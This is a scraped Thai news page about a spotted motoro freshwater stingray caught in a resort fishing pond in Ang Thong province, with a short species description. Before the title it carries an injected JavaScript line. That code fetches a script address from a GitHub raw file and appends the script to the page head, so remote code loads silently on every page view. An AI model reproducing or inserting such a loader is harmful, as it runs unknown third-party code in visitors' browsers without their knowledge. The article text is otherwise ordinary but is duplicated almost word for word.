;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); อ่างทอง ฮือฮาพบปลากระเบนด่างน้ำจืดพันธุ์โมโตโร่พรานเบ็ดจับได้ในบ่อตกปลา - ThaiReference | อาสาไทยยืนยัน
อ่างทอง ฮือฮาพบปลากระเบนด่างน้ำจืดพันธุ์โมโตโร่พรานเบ็ดจับได้ในบ่อตกปลา

 ฮือฮาพบปลากระเบนด่างน้ำจืด  พันธุ์โมโตโร่  พรานเบ็ดจับได้ในบ่อตกปลา  รีสอร์ทบ้านอ่างทอง  วิวทะเลสาบ  ตำบลหนองแม่ไก่  อำเภอโพธิ์ทอง  จังหวัดอ่างทอง  ซึ่งเป็นปลากระเบนด่างน้ำจืด  พันธุ์โมโตโร่  ตัวขนาดใหญ่ 15 นิ้ว  ลูกตาดำ  ลายด่างชัดเจน อายุประมาณ 1 – 2 ปี หลังจากพรานเบ็ดนักตกปลาจับได้  ทางเจ้าเจ้าของรีสอร์ท  ได้นำปลากระเบนด่าง ใส่ตู้ปลาเลี้ยงไว้โชว์นักท่องเที่ยว  นักตกปลาที่มารีสอร์ทบ้านอ่างทอง  ต่างฮือฮา  คาดเป็นตัวแรกของอ่างทอง  และของประเทศไทย

จากการสอบถาม นาย กฤษณะ  ศรีวิลาศ อายุ 47 ปี เจ้าของรีสอร์ทบ้านอ่างทอง  เล่าให้ฟังว่า  รีสอร์ทบ้านอ่างทอง  เป็นรีสอร์ทที่พักผ่อน วิวทะเลสาบ  มีเรือนแพ บ้านพัก ให้นักท่องเที่ยวได้ตกปลา  ซึ่งมีปลานานาชนิดให้พรานเบ็ดไปตกอย่างฉ่ำใจ  ซึ่งที่รีสอร์ทได้ปล่อยปลานานาชนิดลงในบ่อตกปลาขนาดใหญ่  รวมทั้งปลากระเบนน้ำจืด  พันธุ์โมโตโร่ 

ซึ่งเป็นที่ฮือฮา  เมื่อนักท่องเที่ยวตกได้ปลากระเบนด่างทั้งตัว  ในบ่อปลาทะเลสาบของรีสอร์ท  มีลักษณะสวยงามและสมบูรณ์มาก  เป็นปลากระเบนด่างน้ำจืด  พันธุ์โมโตโร่  ตัวขนาดใหญ่ 15 นิ้ว  ลูกตาดำ  ลายด่างชัดเจน อายุประมาณ 1 – 2 ปี  ที่หาดูได้อยากมาก  คาดว่าเป็นปลากระเบนด่างตัวแรกของประเทศไทย  และของโลกอีกด้วย  ซึ่งเป็นปลากระเบนโมโตโร่ด่างติดเผือกอีกต่างหาก  จึงได้นำใส่ตู้เลี้ยงปลาโชว์ไว้ให้นักท่องเที่ยวได้ดูชมความสวยงาม

ปลากระเบนด่างพันธุ์โมโตโร่ (Ocellate river stingray)  คือ  ปลากระเบนน้ำจืดจากอเมริกาใต้  มีลำตัวกลมคล้ายจาน  สีน้ำตาล  มีจุดวงกลมสีส้มเหลือง  ล้อมรอบด้วยสีเข้มกระจายทั่วตัว (เอกลักษณ์ของแต่ละตัว)  และมีเงี่ยงพิษแหลมคม 2 ชิ้น ที่โคนหาง  เป็นที่นิยมเลี้ยงเป็นปลาสวยงาม

@chaijexu

อ่างทอง ฮือฮาพบปลากระเบนด่างน้ำจืดพันธุ์โมโตโร่พรานเบ็ดจับได้ในบ่อตกปลา ฮือฮาพบปลากระเบนด่างน้ำจืด พันธุ์โมโตโร่ พรานเบ็ดจับได้ในบ่อตกปลา รีสอร์ทบ้านอ่างทอง วิวทะเลสาบ ตำบลหนองแม่ไก่ อำเภอโพธิ์ทอง จังหวัดอ่างทอง ซึ่งเป็นปลากระเบนด่างน้ำจืด พันธุ์โมโตโร่ ตัวขนาดใหญ่ 15 นิ้ว ลูกตาดำ ลายด่างชัดเจน อายุประมาณ 1 – 2 ปี หลังจากพรานเบ็ดนักตกปลาจับได้ ทางเจ้าเจ้าของรีสอร์ท ได้นำปลากระเบนด่าง ใส่ตู้ปลาเลี้ยงไว้โชว์นักท่องเที่ยว นักตกปลาที่มารีสอร์ทบ้านอ่างทอง ต่างฮือฮา คาดเป็นตัวแรกของอ่างทอง และของประเทศไทย จากการสอบถาม นาย กฤษณะ ศรีวิลาศ อายุ 47 ปี เจ้าของรีสอร์ทบ้านอ่างทอง เล่าให้ฟังว่า รีสอร์ทบ้านอ่างทอง เป็นรีสอร์ทที่พักผ่อน วิวทะเลสาบ มีเรือนแพ บ้านพัก ให้นักท่องเที่ยวได้ตกปลา ซึ่งมีปลานานาชนิดให้พรานเบ็ดไปตกอย่างฉ่ำใจ ซึ่งที่รีสอร์ทได้ปล่อยปลานานาชนิดลงในบ่อตกปลาขนาดใหญ่ รวมทั้งปลากระเบนน้ำจืด พันธุ์โมโตโร่ ซึ่งเป็นที่ฮือฮา เมื่อนักท่องเที่ยวตกได้ปลากระเบนด่างทั้งตัว ในบ่อปลาทะเลสาบของรีสอร์ท มีลักษณะสวยงามและสมบูรณ์มาก เป็นปลากระเบนด่างน้ำจืด พันธุ์โมโตโร่ ตัวขนาดใหญ่ 15 นิ้ว ลูกตาดำ ลายด่างชัดเจน อายุประมาณ 1 – 2 ปี ที่หาดูได้อยากมาก คาดว่าเป็นปลากระเบนด่างตัวแรกของประเทศไทย และของโลกอีกด้วย ซึ่งเป็นปลากระเบนโมโตโร่ด่างติดเผือกอีกต่างหาก จึงได้นำใส่ตู้เลี้ยงปลาโชว์ไว้ให้นักท่องเที่ยวได้ดูชมความสวยงาม ปลากระเบนด่างพันธุ์โมโตโร่ (Ocellate river stingray) คือ ปลากระเบนน้ำจืดจากอเมริกาใต้ มีลำตัวกลมคล้ายจาน สีน้ำตาล มีจุดวงกลมสีส้มเหลือง ล้อมรอบด้วยสีเข้มกระจายทั่วตัว (เอกลักษณ์ของแต่ละตัว) และมีเงี่ยงพิษแหลมคม 2 ชิ้น ที่โคนหาง เป็นที่นิยมเลี้ยงเป็นปลาสวยงาม ภาพ-ข่าว กนกศักดิ์ แสงตระการ จ.อ่างทอง

♬ เสียงต้นฉบับ – TONGJUDKADHAD NEWS – TONGJUDKADHAD NEWS

ภาพ-ข่าว กนกศักดิ์  แสงตระการ จ.อ่างทอง